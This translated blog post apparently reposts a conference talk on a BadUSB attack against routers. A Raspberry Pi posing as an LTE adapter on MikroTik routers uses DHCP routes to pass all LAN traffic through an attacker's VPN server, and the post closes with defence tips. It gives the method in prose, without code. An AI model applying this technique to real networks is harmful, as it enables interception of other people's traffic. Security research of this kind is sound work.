Hacking Book | Free Online Hacking Learning


using badusb to control the whole network

Posted by graebner at 2020-02-27

Launching a man in the middle attack with raspberry pi

At the first Bsides Dublin conference last weekend, I delivered a speech on "badusb in routers" for routers. The presentation specifically described various badusb attacks against Netgear, tp link, Linksys, ASUS, and Mikrotik routers. In this article, I will introduce a "stand out representative" that can "help" attackers control the entire network.

In the figure above, I plug raspberry PI zero into the USB port of Mikrotik hap. At this point, raspberry PI can manage all traffic of all routers, a typical man in the middle attack.


Now, you're sure to ask, "how did you do it?!"

Attack principle

Let's start with Mikrotik. Many routers of this brand support 3G and 4G USB dongles. And it's not just small routers, like HAP, but also larger rack routers. By default, these devices have a secondary USB WAN interface (network connection via USB interface).

Configured raspberry Pi is displayed as LTE interface

I set the default network device descriptor of p4wnp1 and the vid / PID of a Linksys network adapter for my raspberry PI, so it will be recognized as a new WAN interface. Once plugged in, the router sends a DHCP request to assign an IP address to the new lte1 interface. Then, the DHCP response of raspberry PI will contain some additional routing instructions, which are used to "direct all Internet traffic to the lte1 interface". The instructions involved are as follows.

Router routing table after accepting DHCP response from raspberry pi

SAMY kamkar, rob Fuller, p4wnp1, and I are sure that someone has already used DHCP in the badusb attack. However, since my target is router, all hosts in LAN will be affected.

Of course, raspberry Pi is not a real WAN interface. It doesn't provide Internet access, and there's a dead cycle here.

USB traffic will go back

At present, my solution to this problem is to forward all traffic through VPN server. In the routing instructions issued by badusb, traffic directed to a specific VPN server is not reversed. In this way, raspberry PI can transmit all data to the remote VPN server, which then forwards the data to the Internet.

Final architecture

As long as everything is normal, the requests and responses in the LAN can flow normally. In the figure below, you can see that Mikrotik router transfers traffic to raspberry PI, then to VPN server, and finally to public network through traceroute command.


When the above attack architecture is completed, raspberry PI and VPN server can observe all traffic in the LAN. In the following figure, the client on the left browses securitybsides.com, and Wireshark of VPN server successfully captures the request and response.


If you want to learn more about the technical details, or reproduce the attack yourself, please visit our GitHub. There you can find more information about the hardware and software used, as well as the payload used with the p4wnp1 framework.

Future trend

This kind of attack using raspberry PI may cause the problem that the attack device is too large in practical application (compared with ordinary USB). USB armory or teensy may be used instead in the future.

Above is a USB armory. In addition, there are many routing devices that have this problem, such as Cisco's RV series.


Finally, let's summarize the key points of Defense:

Don't let others physically touch the router.

Disable unused USB ports.

Check the device regularly for strange hardware.

Use encrypted communication whenever possible.

Use VPN to ensure security (for example, in public WiFi environment)

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场 来源:https://medium.com/tenable-techblog/owning-the-network-with-badusb-72daa45d1b00